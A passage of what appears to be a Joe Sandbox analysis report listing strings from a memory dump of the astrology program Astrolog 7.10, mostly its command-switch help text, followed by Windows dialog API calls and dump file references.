                                          • _z0 [<offset>]: Change the default Daylight time setting., xrefs: 6C35D00A
                                          • Switches to access graphics options:, xrefs: 6C35D3F2
                                          • _- [<days>]: Cast chart for specified num of days in the past., xrefs: 6C35D35C
                                          • _ga: Like _g but indicate applying/separating instead of offset orbs., xrefs: 6C35CD6C
                                          • _t <month> <year>: Compute all transits to natal planets in month., xrefs: 6C35CF10
                                          • _HO: Display available planets and other celestial objects., xrefs: 6C35CC81
                                          • _RT[0,1,C,u,U] [..]: Restrict transiting planets in _t lists., xrefs: 6C35D136
                                          • _p0 <month> <day> <year>: Cast solar arc chart for date., xrefs: 6C35D2A8
                                          • _od <file>: Output program's current settings to switch file., xrefs: 6C35D0F0
                                          • 0 = Placidus, 1 = Koch, 2 = Equal, 3 = Campanus, 4 = Meridian,, xrefs: 6C35D226
                                          • _a: Display list of all aspects ordered by influence., xrefs: 6C35CD80
                                          • Switches which determine the type of chart to display:, xrefs: 6C35CD1C
                                          • _Nl [<rows>]: Display nearest cities in atlas to chart location., xrefs: 6C35CFC4
                                          • _r[c,m]0 <file1> <file2> <ratio1> <ratio2>: Weighted chart., xrefs: 6C35D398
                                          • _bs: Use less accurate Moshier formulas instead of Swiss Ephemeris., xrefs: 6C35D1F4
                                          • _Z0: Like _Z but express coordinates relative to polar center., xrefs: 6C35CDE4
                                          • _AP: Parallel aspects based on ecliptic not equatorial positions., xrefs: 6C35D1A4
                                          • _t[p]d: <month> <day> <year>: Compute transits for a single day., xrefs: 6C35CF2E
                                          • _c3: Place in houses using latitude as well as zodiac position., xrefs: 6C35D262
                                          • _x <value>: Cast harmonic chart based on specified factor., xrefs: 6C35D2E4
                                          • _B: Like _d but graph all aspects occurring in a day., xrefs: 6C35CEC0
                                          • _n: Compute chart for this exact moment using current time., xrefs: 6C35CFEC
                                          • _r0 <file1> <file2>: Keep the charts separate in comparison., xrefs: 6C35D3B6
                                          • _dY <years>: Like _d but search within a number of years., xrefs: 6C35CE84
                                          • _a0: Like _a but display aspect summary too., xrefs: 6C35CD8A
                                          • _D: Like _d but display aspects by influence instead of time., xrefs: 6C35CEB6
                                          • _T[t]p <month> <day> <year>: Print progressions instead of transits., xrefs: 6C35CF6A
                                          • _4 [<nest>]: Display objects in their (nested) dwad positions., xrefs: 6C35D30C
                                          • _aa: Like _a but indicate applying/separating instead of offset orbs., xrefs: 6C35CD94
                                          • _t[p]Y: <year> <years>: Compute transits for a number of years., xrefs: 6C35CF42
                                          • _k0: Like _k but only use special characters, not Ansi color., xrefs: 6C35D406
                                          • 19 = Carter Poli Equatorial, 20 = Sunshine, 21 = Null., xrefs: 6C35D258
                                          • _HA: Display available aspects, their angles, and present orbs., xrefs: 6C35CC8B
                                          • _V [..]: Like _t but graph all transits occurring during period., xrefs: 6C35CF7E
                                          • _g0: Like _g but flag aspect configurations (e.g. Yods) too., xrefs: 6C35CD58
                                          • _m0: Like _m but display midpoint summary too., xrefs: 6C35CDC6
                                          • _j: Display astrological influences of each object in chart., xrefs: 6C35CE20
                                          • _tr <month> <year>: Compute all returns in month for chart., xrefs: 6C35CF24
                                          • _C: Include angular and non-angular house cusps in charts., xrefs: 6C35D154
                                          • _T[p]n: Display transits ordered by influence for current date., xrefs: 6C35CF74
                                          • _7: Display Esoteric Astrology and Ray summary for chart., xrefs: 6C35CE34
                                          • _HS: Display information about planets in the solar system., xrefs: 6C35CC9F
                                          • _j0: Like _j but include influences of each zodiac sign as well., xrefs: 6C35CE2A
                                          • _ap: Like _a but do parallel and contraparallel aspects., xrefs: 6C35CD9E
                                          • _zv <elev>: Change the default elevation above sea level., xrefs: 6C35D01E
                                          • _os <file>, > <file>: Redirect output of text charts to file., xrefs: 6C35D0FA
                                          • _rp[0] <file1> <file2>: Like _r0 but do file1 progr. to file2., xrefs: 6C35D3C0
                                          • _w [<rows>]: Display chart in a graphic house wheel format., xrefs: 6C35CD3A
                                          • _k: Display text charts using Ansi characters and color., xrefs: 6C35D3FC
                                          • _kh: Text charts saved to file use HTML instead of Ansi codes., xrefs: 6C35D410
                                          • _RO <obj>: Require object to be present in aspects., xrefs: 6C35D14A
                                          • 7.10, xrefs: 6C35CC43
                                          • _zy <year>: Set only the year of current chart., xrefs: 6C35D050
                                          • Compute chart automatically given specified data., xrefs: 6C35D0A0
                                          • _B[m,y,Y]: Like _B but for entire month, year, or five years., xrefs: 6C35CECA
                                          • _o0 <file> [..]: Like _o but output planet/house positions., xrefs: 6C35D0E6
                                          • _zj <name> <place>: Change the default name and place strings., xrefs: 6C35D028
                                          • _zd <date>: Set only the day of current chart., xrefs: 6C35D03C
                                          • _EY <years>: Display planetary ephemeris for a number of years., xrefs: 6C35CEF2
                                          • _qa <month> <date> <year> <time> <zone> <long> <lat>:, xrefs: 6C35D096
                                          • _l: Display Gauquelin sectors for each planet in chart., xrefs: 6C35CE0C
                                          • _gm: For comparison charts, show midpoints instead of aspects., xrefs: 6C35CD62
                                          • _G: Compute houses based on geographic location only., xrefs: 6C35D320
                                          • _t[py]n: Compute transits to natal planets for current time now., xrefs: 6C35CF4C
                                          • _He: Display all tables together (_Hc_H_Y_HX_HC_HO_HA%s_HS_H7%s)., xrefs: 6C35CCCA
                                          • _r[3,4]: Make graphics wheel chart tri-wheel or quad-wheel., xrefs: 6C35D3D4
                                          • _dp <month> <year>: Print aspects within progressed chart., xrefs: 6C35CE8E
                                          • 14 = Whole, 15 = Vedic, 16 = Sripati, 17 = Horizon, 18 = APC,, xrefs: 6C35D24E
                                          • _qy <year>: Compute chart for first day of year., xrefs: 6C35D08C
                                          • _F <objnum> <sign> <deg>: Force object's position to be value., xrefs: 6C35D33E
                                          • _qm <month> <year>: Compute chart for first of month., xrefs: 6C35D082
                                          • _b0: Display locations and times to the nearest second., xrefs: 6C35D1EA
                                          • _y[b,d,p,t] <file>: Like _r0 but compare to current time now., xrefs: 6C35D3E8
                                          • _M0 <1-48> <string>: Define the specified command switch macro., xrefs: 6C35CCFE
                                          • _E[]0 <step>: Display ephemeris times for days, months, or years., xrefs: 6C35CEFC
                                          • _dpy <year>: Like _dp but search for aspects within entire year., xrefs: 6C35CE98
                                          • _+ [<days>]: Cast chart for specified num of days in the future., xrefs: 6C35D352
                                          • _M[2-4][0] <strings>: Define macro(s) to run when chart calculated., xrefs: 6C35CD08
                                          • _R1 [<obj1> ..]: Like _R0 but unrestrict and show all objects., xrefs: 6C35D122
                                          • _ma: Like _m but show aspects from midpoints to planets as well., xrefs: 6C35CDD0
                                          • _dm: Like _d but print all aspects for the entire month., xrefs: 6C35CE70
                                          • _v0: Like _v but express velocities relative to average speed., xrefs: 6C35CD30
                                          • _rt <file1> <file2>: Like _r0 but treat file2 as transiting., xrefs: 6C35D3CA
                                          • _Tt <month> <day> <year> <time>: Like _T but specify time too., xrefs: 6C35CF60
                                          • Like _qa but takes additional parameter for Daylight offset., xrefs: 6C35D0B4
                                          • _s [..]: Compute a sidereal instead of standard tropical chart., xrefs: 6C35D26C
                                          • _f: Display houses as sign positions (flip them)., xrefs: 6C35D316
                                          • _h [<objnum>]: Compute positions centered on specified object., xrefs: 6C35D294
                                          • _u: Include transneptunian/Uranian bodies in charts., xrefs: 6C35D15E
                                          • _A <0-18>: Specify the number of aspects to use in charts., xrefs: 6C35D186
                                          • _tp <month> <year>: Compute progressions to natal in month for chart., xrefs: 6C35CF1A
                                          • Astrolog, xrefs: 6C35CC48
                                          • _c <value>: Select a different system of house division., xrefs: 6C35D21C
                                          • _Y: Display help list of less commonly used command switches., xrefs: 6C35CD12
                                          • _U: Include locations of fixed background stars in charts., xrefs: 6C35D168
                                          • _d [<step>]: Print all aspects and changes occurring in a day., xrefs: 6C35CE66
                                          • _pC <days>: Set factor to use when progressing cusps (default 1.0)., xrefs: 6C35D2DA
                                          • _B0: Like _B but don't restrict fast moving objects from graph., xrefs: 6C35CED4
                                          • _zi <name> <place>: Set name and place strings of current chart., xrefs: 6C35D05A
                                          • _Ad <planet> <orb>: Specify orb addition given to a planet., xrefs: 6C35D1C2
                                          • _Ey: Display planetary ephemeris for the entire year., xrefs: 6C35CEE8
                                          • _Fm <objnum> <obj1> <obj2>: Force object's position to midpoint., xrefs: 6C35D348
                                          • _zt <time>: Set only the time of current chart., xrefs: 6C35D032
                                          • _2 [<objnum>]: Cast chart with specified object on Midheaven., xrefs: 6C35D2F8
                                          • _I [<columns>]: Print interpretation of selected charts., xrefs: 6C35CFD8
                                          • _U[z,l,n,b,d,v]: Sort stars by zodiac position, latitude, name,, xrefs: 6C35D172
                                          • _Ao <aspect> <orb>: Specify maximum orb for an aspect., xrefs: 6C35D1AE
                                          • _P[z,n,f]: Order parts by position, name, or formula., xrefs: 6C35CFB0
                                          • _v: Display list of object positions (chosen by default)., xrefs: 6C35CD26
                                          • _R0 [<obj1> ..]: Like _R but restrict everything first., xrefs: 6C35D118
                                          • _M <1-48>: Run the specified command switch macro., xrefs: 6C35CCF4
                                          • Switches for relationship and comparison charts:, xrefs: 6C35D370
                                          • 9 = Alcabitius, 10 = Krusinski, 11 = Equal (Midheaven),, xrefs: 6C35D23A
                                          • _sr0: Like _sr but only display declinations instead of latitudes., xrefs: 6C35D280
                                          • _Zd[m,y,Y] [<years>]: Like _Zd but for entire month, year, or years., xrefs: 6C35CDF8
                                          • _rm <file1> <file2>: Compute a time space midpoint chart., xrefs: 6C35D38E
                                          • _R[C,u,U]: Restrict all minor cusps, all Uranians, or stars., xrefs: 6C35D12C
                                          • _+[m,y] [<value>]: Cast chart for num of months/years in future., xrefs: 6C35D366
                                          • _A3: Aspects calculated by latitude combined with zodiac position., xrefs: 6C35D190
                                          • _pd <days>: Set num of days to progress / day (default 365.24219)., xrefs: 6C35D2D0
                                          • brightness, distance, or zodiac position velocity., xrefs: 6C35D17C
                                          • _dpY <year> <years>: Like _dp but search within number of years., xrefs: 6C35CEA2
                                          • _S: Display x,y,z coordinate positions of planets in space., xrefs: 6C35CE02
                                          • _bp: Use less accurate Placalc ephemeris instead of Swiss Ephemeris., xrefs: 6C35D1FE
                                          • _L [<step>]: Display astro-graph locations of planetary angles., xrefs: 6C35CE3E
                                          • _Aa <aspect> <angle>: Change the actual angle of an aspect., xrefs: 6C35D1CC
                                          • _J: Display wheel charts in Vedic format., xrefs: 6C35D32A
                                          • 5 = Regiomontanus, 6 = Porphyry, 7 = Morinus, 8 = Topocentric,, xrefs: 6C35D230
                                          • _Hc: Display program credits and copyrights., xrefs: 6C35CC6D
                                          • _l0: Like _l but approximate sectors using Placidus cusps., xrefs: 6C35CE16
                                          • _p[0]n: Cast progressed chart based on current date now., xrefs: 6C35D2C6
                                          • _RA [<asp1> ..]: Restrict specific aspects from displays., xrefs: 6C35D140
                                          • _Q0: Like _Q but prompt for additional switches on startup., xrefs: 6C35CCEA
                                          • _bm: Use inaccurate Matrix formulas when ephemeris unavailable., xrefs: 6C35D208
                                          • _g: Display aspect and midpoint grid among planets., xrefs: 6C35CD4E
                                          • _HI, xrefs: 6C35CCBD
                                          • _n[d,m,y]: Compute chart for start of current day, month, year., xrefs: 6C35CFF6
                                          • _Zd: Search day for object local rising and setting times., xrefs: 6C35CDEE
                                          • _qb <month> <date> <year> <time> <daylight> <zone> <long> <lat>:, xrefs: 6C35D0AA
                                          • _P [<parts>]: Display list of Arabic parts and their positions., xrefs: 6C35CF9C
                                          • 12 = Pullen Sinusoidal Ratio, 13 = Pullen Sinusoidal Delta,, xrefs: 6C35D244
                                          • _p1 <month> <day> <year>: Like _p but with solar arc cusps only., xrefs: 6C35D2B2
                                          • Switches which affect what information is used in a chart:, xrefs: 6C35D104
                                          • _sr: Compute right ascension locations relative to equator., xrefs: 6C35D276
                                          • _t[p]y: <year>: Compute transits/progressions for entire year., xrefs: 6C35CF38
                                          • Switches which affect how the chart parameters are obtained:, xrefs: 6C35CFE2
                                          • _Am <planet> <orb>: Specify maximum orb allowed to a planet., xrefs: 6C35D1B8
                                          • _dy: Like _d but print all aspects for the entire year., xrefs: 6C35CE7A
                                          • _gp: Like _g but generate parallel and contraparallel aspects., xrefs: 6C35CD76
                                          • _E: Display planetary ephemeris for given month., xrefs: 6C35CEDE
                                          • _P0 [<parts>]: Like _P but display formulas with terms reversed., xrefs: 6C35CFA6
                                          • _p[0]t <month> <day> <year> <time>: Like _p but specify time too., xrefs: 6C35D2BC
                                          • _9: Display objects in their zodiac navamsa positions., xrefs: 6C35D334
                                          • _K: Display a calendar for given month., xrefs: 6C35CE52
                                          • _p <month> <day> <year>: Cast secondary progressed chart for date., xrefs: 6C35D29E
                                          • _H7: Display information about the seven esoteric Rays., xrefs: 6C35CCA9
                                          • _L0 [..]: Like _L but display list of latitude crossings too., xrefs: 6C35CE48
                                          • _s[z,h,d]: Display locations as in zodiac, hours/minutes, or degrees., xrefs: 6C35D28A
                                          • _y <file>: Display current house transits for particular chart., xrefs: 6C35D3DE
                                          • _zm <month>: Set only the month of current chart., xrefs: 6C35D046
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__output_l
                                          • String ID: Switches for relationship and comparison charts:$Switches to access graphics options:$Switches which affect how a chart is computed:$Switches which affect how the chart parameters are obtained:$Switches which affect what information is used in a chart:$Switches which determine the type of chart to display:$ brightness, distance, or zodiac position velocity.$ 0 = Placidus, 1 = Koch, 2 = Equal, 3 = Campanus, 4 = Meridian,$ 12 = Pullen Sinusoidal Ratio, 13 = Pullen Sinusoidal Delta,$ 14 = Whole, 15 = Vedic, 16 = Sripati, 17 = Horizon, 18 = APC,$ 19 = Carter Poli Equatorial, 20 = Sunshine, 21 = Null.$ 2nd planet, aspect, 1st position, 2nd position, midpoint.$ 5 = Regiomontanus, 6 = Porphyry, 7 = Morinus, 8 = Topocentric,$ 9 = Alcabitius, 10 = Krusinski, 11 = Equal (Midheaven),$ Compute chart automatically given specified data.$ Like _qa but takes additional parameter for Daylight offset.$ _+ [<days>]: Cast chart for specified num of days in the future.$ _+[m,y] [<value>]: Cast chart for num of months/years in future.$ _- [<days>]: Cast chart for specified num of days in the past.$ _1 [<objnum>]: Cast chart with specified object on Ascendant.$ _2 [<objnum>]: Cast chart with specified object on Midheaven.$ _3: Display objects in their zodiac decan positions.$ _4 [<nest>]: Display objects in their (nested) dwad positions.$ _7: Display Esoteric Astrology and Ray summary for chart.$ _9: Display objects in their zodiac navamsa positions.$ _A <0-18>: Specify the number of aspects to use in charts.$ _A3: Aspects calculated by latitude combined with zodiac position.$ _AP: Parallel aspects based on ecliptic not equatorial positions.$ _Aa <aspect> <angle>: Change the actual angle of an aspect.$ _Ad <planet> <orb>: Specify orb addition given to a planet.$ _Am <planet> <orb>: Specify maximum orb allowed to a planet.$ _Ao <aspect> <orb>: Specify maximum orb for an aspect.$ _Ap: Orb limits apply to latitude as well as zodiac position.$ _B0: Like _B but don't restrict fast moving objects from graph.$ _B: Like _d but graph all aspects occurring in a day.$ _B[m,y,Y]: Like _B but for entire month, year, or five years.$ _C: Include angular and non-angular house cusps in charts.$ _D: Like _d but display aspects by influence instead of time.$ _E: Display planetary ephemeris for given month.$ _EY <years>: Display planetary ephemeris for a number of years.$ _E[]0 <step>: Display ephemeris times for days, months, or years.$ _Ey: Display planetary ephemeris for the entire year.$ _F <objnum> <sign> <deg>: Force object's position to be value.$ _Fm <objnum> <obj1> <obj2>: Force object's position to midpoint.$ _G: Compute houses based on geographic location only.$ _H7: Display information about the seven esoteric Rays.$ _H: Display this help list.$ _HA: Display available aspects, their angles, and present orbs.$ _HC: Display names of zodiac signs and houses.$ _HF: Display names of astronomical constellations.$ _HI: Display meanings of signs, houses, planets, and aspects.$ _HO: Display available planets and other celestial objects.$ _HS: Display information about planets in the solar system.$ _Hc: Display program credits and copyrights.$ _He: Display all tables together (_Hc_H_Y_HX_HC_HO_HA%s_HS_H7%s).$ _I [<columns>]: Print interpretation of selected charts.$ _J: Display wheel charts in Vedic format.$ _K: Display a calendar for given month.$ _Ky: Like _K but display a calendar for the entire year.$ _L [<step>]: Display astro-graph locations of planetary angles.$ _L0 [..]: Like _L but display list of latitude crossings too.$ _M <1-48>: Run the specified command switch macro.$ _M0 <1-48> <string>: Define the specified command switch macro.$ _M[2-4][0] <strings>: Define macro(s) to run when chart calculated.$ _N [<rows>]: Lookup chart location as city in atlas.$ _Nl [<rows>]: Display nearest cities in atlas to chart location.$ _Nz [<rows>]: Display all time changes in time zone of chart city.$ _P [<parts>]: Display list of Arabic parts and their positions.$ _P0 [<parts>]: Like _P but display formulas with terms reversed.$ _P[z,n,f]: Order parts by position, name, or formula.$ _Q0: Like _Q but prompt for additional switches on startup.$ _Q: Prompt for more command switches after display finished.$ _R [<obj1> [<obj2> ..]]: Restrict specific bodies from displays.$ _R0 [<obj1> ..]: Like _R but restrict everything first.$ _R1 [<obj1> ..]: Like _R0 but unrestrict and show all objects.$ _RA [<asp1> ..]: Restrict specific aspects from displays.$ _RO <obj>: Require object to be present in aspects.$ _RT[0,1,C,u,U] [..]: Restrict transiting planets in _t lists.$ _R[C,u,U]: Restrict all minor cusps, all Uranians, or stars.$ _S: Display x,y,z coordinate positions of planets in space.$ _T <month> <day> <year>: Display transits ordered by influence.$ _T[p]n: Display transits ordered by influence for current date.$ _T[t]p <month> <day> <year>: Print progressions instead of transits.$ _Tt <month> <day> <year> <time>: Like _T but specify time too.$ _U: Include locations of fixed background stars in charts.$ _U[z,l,n,b,d,v]: Sort stars by zodiac position, latitude, name,$ _V [..]: Like _t but graph all transits occurring during period.$ _V[..]0: Like _V but don't restrict fast moving objects from graph.$ _V[d,y,Y] [[<day>] <month>] <year>: Like _V for day, year, or 5 years.$ _Y: Display help list of less commonly used command switches.$ _Z0: Like _Z but express coordinates relative to polar center.$ _Z: Display planet locations with respect to the local horizon.$ _Zd: Search day for object local rising and setting times.$ _Zd[m,y,Y] [<years>]: Like _Zd but for entire month, year, or years.$ _a0: Like _a but display aspect summary too.$ _a: Display list of all aspects ordered by influence.$ _a[jonOPACDm]: Sort aspects by power, orb, orb difference, 1st planet,$ _aa: Like _a but indicate applying/separating instead of offset orbs.$ _ap: Like _a but do parallel and contraparallel aspects.$ _b0: Display locations and times to the nearest second.$ _b: Use ephemeris files for more accurate location computations.$ _bU: Use inaccurate Matrix formulas for fixed stars only.$ _bm: Use inaccurate Matrix formulas when ephemeris unavailable.$ _bp: Use less accurate Placalc ephemeris instead of Swiss Ephemeris.$ _bs: Use less accurate Moshier formulas instead of Swiss Ephemeris.$ _c <value>: Select a different system of house division.$ _c3: Place in houses using latitude as well as zodiac position.$ _d [<step>]: Print all aspects and changes occurring in a day.$ _dY <years>: Like _d but search within a number of years.$ _dm: Like _d but print all aspects for the entire month.$ _dp <month> <year>: Print aspects within progressed chart.$ _dpY <year> <years>: Like _dp but search within number of years.$ _dp[y]n: Search for progressed aspects in current month/year.$ _dpy <year>: Like _dp but search for aspects within entire year.$ _dy: Like _d but print all aspects for the entire year.$ _e: Print all charts together (_v_w_g_a_m_Z_S_l_j_7_L_K_Zd_d_D_B_E).$ _f: Display houses as sign positions (flip them).$ _g0: Like _g but flag aspect configurations (e.g. Yods) too.$ _g: Display aspect and midpoint grid among planets.$ _ga: Like _g but indicate applying/separating instead of offset orbs.$ _gm: For comparison charts, show midpoints instead of aspects.$ _gp: Like _g but generate parallel and contraparallel aspects.$ _h [<objnum>]: Compute positions centered on specified object.$ _i <file>: Compute chart based on info in file.$ _i[2,3,4] <file>: Load chart info into chart slots 2, 3, or 4.$ _j0: Like _j but include influences of each zodiac sign as well.$ _j: Display astrological influences of each object in chart.$ _k0: Like _k but only use special characters, not Ansi color.$ _k: Display text charts using Ansi characters and color.$ _kh: Text charts saved to file use HTML instead of Ansi codes.$ _l0: Like _l but approximate sectors using Placidus cusps.$ _l: Display Gauquelin sectors for each planet in chart.$ _m0: Like _m but display midpoint summary too.$ _m: Display all object midpoints in sorted zodiac order.$ _ma: Like _m but show aspects from midpoints to planets as well.$ _n: Compute chart for this exact moment using current time.$ _n[d,m,y]: Compute chart for start of current day, month, year.$ _o <file> [..]: Write parameters of current chart to file.$ _o0 <file> [..]: Like _o but output planet/house positions.$ _od <file>: Output program's current settings to switch file.$ _os <file>, > <file>: Redirect output of text charts to file.$ _p <month> <day> <year>: Cast secondary progressed chart for date.$ _p0 <month> <day> <year>: Cast solar arc chart for date.$ _p1 <month> <day> <year>: Like _p but with solar arc cusps only.$ _pC <days>: Set factor to use when progressing cusps (default 1.0).$ _p[0]n: Cast progressed chart based on current date now.$ _p[0]t <month> <day> <year> <time>: Like _p but specify time too.$ _pd <days>: Set num of days to progress / day (default 365.24219).$ _q <month> <date> <year> <time>: Compute chart with defaults.$ _qa <month> <date> <year> <time> <zone> <long> <lat>:$ _qb <month> <date> <year> <time> <daylight> <zone> <long> <lat>:$ _qd <month> <date> <year>: Compute chart for noon on date.$ _qj <day>: Compute chart for time of specified Julian day.$ _qm <month> <year>: Compute chart for first of month.$ _qy <year>: Compute chart for first day of year.$ _r <file1> <file2>: Compute a relationship synastry chart.$ _r0 <file1> <file2>: Keep the charts separate in comparison.$ _r[3,4]: Make graphics wheel chart tri-wheel or quad-wheel.$ _r[c,m]0 <file1> <file2> <ratio1> <ratio2>: Weighted chart.$ _rb <file1> <file2>: Display biorhythm for file1 at time file2.$ _rc <file1> <file2>: Compute a composite chart.$ _rd <file1> <file2>: Print time span between files' dates.$ _rm <file1> <file2>: Compute a time space midpoint chart.$ _rp[0] <file1> <file2>: Like _r0 but do file1 progr. to file2.$ _rt <file1> <file2>: Like _r0 but treat file2 as transiting.$ _s [..]: Compute a sidereal instead of standard tropical chart.$ _s[z,h,d]: Display locations as in zodiac, hours/minutes, or degrees.$ _sr0: Like _sr but only display declinations instead of latitudes.$ _sr: Compute right ascension locations relative to equator.$ _t <month> <year>: Compute all transits to natal planets in month.$ _t[p]Y: <year> <years>: Compute transits for a number of years.$ _t[p]d: <month> <day> <year>: Compute transits for a single day.$ _t[p]y: <year>: Compute transits/progressions for entire year.$ _t[py]n: Compute transits to natal planets for current time now.$ _tp <month> <year>: Compute progressions to natal in month for chart.$ _tr <month> <year>: Compute all returns in month for chart.$ _u: Include transneptunian/Uranian bodies in charts.$ _v0: Like _v but express velocities relative to average speed.$ _v: Display list of object positions (chosen by default).$ _w [<rows>]: Display chart in a graphic house wheel format.$ _w0 [..]: Like _w but reverse order of objects in houses 4..9.$ _x <value>: Cast harmonic chart based on specified factor.$ _y <file>: Display current house transits for particular chart.$ _y[b,d,p,t] <file>: Like _r0 but compare to current time now.$ _z [<zone>]: Change the default time zone (for _d_E_t_q options).$ _z0 [<offset>]: Change the default Daylight time setting.$ _zN <city>: Lookup city in atlas and set zone, Daylight, and location.$ _zd <date>: Set only the day of current chart.$ _zi <name> <place>: Set name and place strings of current chart.$ _zj <name> <place>: Change the default name and place strings.$ _zl <long> <lat>: Change the default longitude & latitude.$ _zm <month>: Set only the month of current chart.$ _zt <time>: Set only the time of current chart.$ _zv <elev>: Change the default elevation above sea level.$ _zy <year>: Set only the year of current chart.$%s (version %s) command switches:$7.10$Astrolog$_HF$_HI
                                          • API String ID: 1830584065-1115848666
                                          • Opcode ID: b5757d01faaef55038c8728ecd08a6a2540195a08b2158442662492c01409669
                                          • Instruction ID: 8374b951d02b404e932245c627ac9937798c2c4ce2ddf8575e472ad8a55cbbf8
                                          • Opcode Fuzzy Hash: b5757d01faaef55038c8728ecd08a6a2540195a08b2158442662492c01409669
                                          • Instruction Fuzzy Hash: 7BD1EBB8F5D15DCAE506F7FDA4CAEECF5520BAA15C7900430A0E59EF40DB0CD9294AA3
                                          APIs
                                          • GetDlgItemTextA.USER32(?,00000474,?,000000FF), ref: 6C3AC053
                                          • GetDlgItemInt.USER32(?,00000475,00000000,00000001), ref: 6C3AC071
                                          • GetDlgItemTextA.USER32(?,00000476,?,000000FF), ref: 6C3AC087
                                          • IsDlgButtonChecked.USER32(?,00000533), ref: 6C3AC0E5
                                          • IsDlgButtonChecked.USER32(?,0000052F), ref: 6C3AC0F2
                                          • IsDlgButtonChecked.USER32(?,00000536), ref: 6C3AC0FF
                                          • IsDlgButtonChecked.USER32(?,00000538), ref: 6C3AC10C
                                          • IsDlgButtonChecked.USER32(?,0000052E), ref: 6C3AC119
                                          • IsDlgButtonChecked.USER32(?,0000052D), ref: 6C3AC126
                                          • IsDlgButtonChecked.USER32(?,00000535), ref: 6C3AC133
                                          • IsDlgButtonChecked.USER32(?,00000534), ref: 6C3AC140
                                          • IsDlgButtonChecked.USER32(?,00000532), ref: 6C3AC156
                                          • IsDlgButtonChecked.USER32(?,00000527), ref: 6C3AC163
                                          • IsDlgButtonChecked.USER32(?,00000531), ref: 6C3AC170
                                          • IsDlgButtonChecked.USER32(?,00000539), ref: 6C3AC17D
                                          • GetDlgItemTextA.USER32(?,00000477,?,000000FF), ref: 6C3AC19B
                                          • GetDlgItemTextA.USER32(?,00000478,?,000000FF), ref: 6C3AC1C1
                                          • IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AC1DD
                                          • IsDlgButtonChecked.USER32(?,000004B7), ref: 6C3AC1F2
                                          • IsDlgButtonChecked.USER32(?,000004BA), ref: 6C3AC207
                                          • IsDlgButtonChecked.USER32(?,000004BB), ref: 6C3AC21C
                                          • IsDlgButtonChecked.USER32(?,6C46DECC), ref: 6C3AC251
                                          • _memset.LIBCMT ref: 6C3AC27D
                                          • _memset.LIBCMT ref: 6C3AC29C
                                          • IsDlgButtonChecked.USER32(?,00000537), ref: 6C3AC2B9
                                          • IsDlgButtonChecked.USER32(?,6C47A9B4), ref: 6C3AC2E7
                                          • EndDialog.USER32(?,00000001), ref: 6C3AC303
                                          • CheckDlgButton.USER32(?,00000533), ref: 6C3AC347
                                          • CheckDlgButton.USER32(?,0000052F), ref: 6C3AC355
                                          • CheckDlgButton.USER32(?,00000536), ref: 6C3AC363
                                          • CheckDlgButton.USER32(?,00000538), ref: 6C3AC371
                                          • CheckDlgButton.USER32(?,0000052E), ref: 6C3AC37F
                                          • CheckDlgButton.USER32(?,0000052D), ref: 6C3AC38D
                                          • CheckDlgButton.USER32(?,00000535), ref: 6C3AC39B
                                          • CheckDlgButton.USER32(?,00000534), ref: 6C3AC3A9
                                          • SetDlgItemTextA.USER32(?,00000476,None), ref: 6C3AC3CE
                                          • CheckDlgButton.USER32(?,00000532), ref: 6C3AC3DC
                                          • CheckDlgButton.USER32(?,00000527), ref: 6C3AC3EA
                                          • CheckDlgButton.USER32(?,00000531), ref: 6C3AC3F8
                                          • CheckDlgButton.USER32(?,00000539,00000000), ref: 6C3AC40C
                                          • SetDlgItemTextA.USER32(?,00000477,00000000), ref: 6C3AC427
                                          • SetDlgItemTextA.USER32(?,00000478,00000000), ref: 6C3AC442
                                          • CheckRadioButton.USER32(?,000004B7,000004B9,00000000), ref: 6C3AC46E
                                          • CheckRadioButton.USER32(?,000004BA,000004BC,000004BB), ref: 6C3AC498
                                          • CheckDlgButton.USER32(?,00000528,00010100), ref: 6C3AC4C0
                                          • SetDlgItemInt.USER32(?,00000474,00000001), ref: 6C3AC4DD
                                          • SetDlgItemInt.USER32(?,00000475,00000001), ref: 6C3AC4ED
                                          • CheckDlgButton.USER32(?,00000537), ref: 6C3AC4FB
                                          • CheckDlgButton.USER32(?,0000053A,00000000), ref: 6C3AC523
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
